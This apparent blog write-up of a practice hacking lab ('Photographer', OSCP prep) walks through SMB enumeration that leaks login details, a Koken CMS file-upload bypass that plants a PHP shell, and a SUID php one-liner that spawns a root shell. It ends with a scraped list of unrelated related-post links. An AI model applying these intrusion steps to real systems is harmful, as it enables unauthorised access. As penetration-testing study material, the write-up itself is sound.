PGP Target Photographer
考虑了很久,还是决定把英文的报告放上来供大家加参考,毕竟参加OSCP证明是需要英文报告的,不联系英文确实过不了,以后大部份报告会以英文报告形式发出,不会有难词,都是简单词,有小学水平就能看懂 ,如果有懂英文的 码友 ,非常欢迎指出我的语法错误
A few days long , I don't write something about OSCP test . So I decide to write two passage today about these days I do .
Enum
Nmap showed the machine servered ssh , web , SMB and something else on 8000 .
80 port
When I viewed index of the website , I found it just a html site , and there was not much point waiting me to test . So I used dirsearch , but also found nothing instead of many useless js file .
445 & 139 port
I found a new smb scaner enum4linux , and it could be used easily .
enum4linux 192.168.248.76
And I was told this smb server could be logged into by anonymity without password . Besides It gave me a smbshare path .
So I used smbclient to login and tried to find some in it .
There wae a mail bak in the share path . And I showed me some inportant informationes . Daisa , daisa@photographer.com and my babygirl :)
8000 port
This was a Koken CMS . And i found there was a file upload exploit in searchsploit
If I wanted to use it I had to found a log panel and logged in it .
So I used dirsearch again and found /admin path .
Now let's start our harking .
Shell as www
Firstly , I used daisa@photographer.com:babygirl to log into the system and found the "import content" bottom mentioned in exp .
I uploaded a php shell code as jpg and changed it back to php in burpsuite
And I got the shell as www .
Shell as root
As I searched suid process , I found php was gave suid so it's very easy to get the root shell .
php -r "pcntl_exec('/bin/sh', ['-p']);"
And again I got the shell as root .
After root
When I viewed 8000 port , here was more than 30 seconds to open one page because this site used google api to speed up the load speed . However , I could not visit google in China . If you have the same problem like me , I suggest you to use this justjavac/ReplaceGoogleCDN: 一个 Chrome 插件:将 Google CDN 替换为国内的。 (github.com)
PGP Target Photographer相关推荐
- java pgp_Java相当好的隐私(PGP)
java pgp 公钥加密 这篇文章讨论了PGP或"很好的隐私". PGP是常规加密和公用密钥加密的混合实现. 在详细介绍PGP之前,让我们先谈谈公钥加密. 与其他任何加密技术一样 ...
- Java相当好的隐私(PGP)
公钥加密 这篇文章讨论了PGP或"很好的隐私". PGP是常规加密和公用密钥加密的混合实现. 在详细介绍PGP之前,让我们先谈谈公钥加密. 与其他任何加密技术一样,公钥加密解决了通 ...
- vulnhub靶机-Photographer: 1
1.找到靶机ip:192.168.8.168 nmap -sn 192.168.8.0/24 2.扫描靶机端口 root@kali:~# nmap -A -p- 192.168.8.168 Start ...
- SVN优化(一) SVN忽略maven项目的target
SVN优化(一) SVN忽略maven项目的target 一 eclipse刚开始导入的项目: 二 解决办法 方式一: 在项目代码路径,如: F:\xyx\sl 鼠标右键,"Tortoi ...
- Lint found fatal errors while assembling a release target.
错误如下 Lint found fatal errors while assembling a release target. To proceed, either fix the issues id ...
- CMake 打包已经存在的动态库生成 target
一. 背景 在 CMakeLists.txt 中,某模块 A 通过 add_subdirectory 引入模块 B ,模块 B 通过 add_subdirectory 引入模块 C.模块 C 里面本身 ...
- 记录CSS3 target伪类简介
CSS3 target伪类是众多实用的CSS3特性中的一个.它用来匹配文档(页面)的URI中某个标志符的目标元素.具体来说,URI中的标志符通常会包含一个"#"字符,然后后面带有一 ...
- HTML教程-各窗口间相互操作(Frame Target)
文章来源: 山西之窗 由Frames分出来的几个窗口的内容并不是静止不变的,往往一个窗口的内容随着另一个窗口的要求而不断变化,这就提高了Frames的利用价值.为了完成各窗口之间的相互操作,我们必须为 ...
- gpg加密命令 linux_用 PGP 保护代码完整性(五):将子密钥移到一个硬件设备中 | Linux 中国...
在这个系列教程中,将为你提供使用 PGP 和保护你的私钥的最佳体验.-- Konstantin Ryabitsev致谢译自 | linux.com 作者 | Konstantin Ryabitsev译 ...
最新文章
- [LeetCode] Intersection of Two Linked Lists 求两个链表的交点
- [No0000142]Outlook通过添加签名 自动添加邮件模板
- codeforce 837C
- 一道经典面试题 你是是否理解 if()没有大括号与有大括号区别吗?
- win访问linux NFS磁盘映射共享驱动器卡顿
- Ubuntu18.04终端里,随意拖动或双击会出现ctrl+C的效果,解决
- stm32芯片超时无应答解决
- 单反相机入门教程视频 从入门到精通(48集)
- 中国石油大学《社交礼仪》在线考试
- 网友发现Q版西游:唐僧师徒脸谱上50元人民币
- Error opening dll library错误的解决
- Easy Connect连接网络请求异常
- uniapp 最接近微信的图片压缩插件 Ba-ImageCompressor
- 伪概念催生人工智能行业泡沫 2018年或迎大洗牌
- AS 5637.1跟AS 3837是什么关系?
- 星际酒馆反甲、吸血、毒质变、伤害buff的分析
- js和jQury实现Aajx
- QT中QVector的使用
- 【Python】语法基本结构
- Kubernetes组件Ingress